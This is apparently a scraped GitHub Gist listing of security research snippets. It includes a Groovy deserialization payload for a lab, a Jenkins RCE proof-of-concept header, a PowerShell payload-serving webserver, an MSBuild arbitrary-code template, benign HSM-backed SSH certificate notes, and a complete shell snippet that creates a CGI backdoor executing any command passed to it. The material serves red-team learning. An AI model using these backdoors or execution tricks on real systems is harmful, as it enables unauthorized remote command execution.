Chris Gates carnal0wnage

DiabloHorn /
Created Sep 9, 2017
Java class to generate a Groovy serialized payload
DiabloHorn -
For learning purposes we build the groovy payload ourselves instead of using
ysoserial. This helps us better understand the chain and the mechanisms
involved in exploiting this bug.
compile with:
javac -cp <path to groovy lib>
javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar

DiabloHorn /
Created Sep 9, 2017
Exploit for the DeserLab vulnerable implementation
#!/usr/bin/env python
DiabloHorn -

adamyordan /
Last active Jul 29, 2019
# Author: Adam Jordan
# Date: 2019-02-15
# Repository:
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
import argparse
import jenkins

akhil-reni / payload
Created Jul 26, 2019
Jenkins Metaprogramming RCE Create new user

cobbr / server.ps1
Last active Jan 30, 2020 — forked from obscuresec/dirtywebserver.ps1
Dirty PowerShell Webserver
$mk = (new-object net.webclient).downloadstring("")
$Hso = New-Object Net.HttpListener
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
$Buf = [Text.Encoding]::UTF8.GetBytes($mk)

Arno0x / msbuild.xml
Created Nov 17, 2017
MSBuild project definition to execute arbitrary code from msbuild.exe
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
<Target Name="Hello">
<SharpLauncher >

YubiHSM2 Backed SSH Certificates
### I use HSM backed SSH certs and so can you. [why?: keys can be stolen, certs expire!]
1. Get a YubiHSM2 @
2. Follow this: [ Yes, you're going to have to install all the other yubico stuff too, yubico-connector, etc, ..] on your issuing machine, or airgapped machine.
3. Be content that you can now sign certificates with the HSM on the issuer/airgapped machine.
4. Update /etc/ssh/sshd_config on remote server to add:
TrustedUserCAKeys /etc/ssh/
AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u
5. Add principals here:

xsl-notepad.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="" ?>

Cumulus Toolkit Cliff Notes

By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to set up the full environment; please let me know if you are interested in such a thing.

gist:38dcff6a0975f148aa858e924d64c492
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi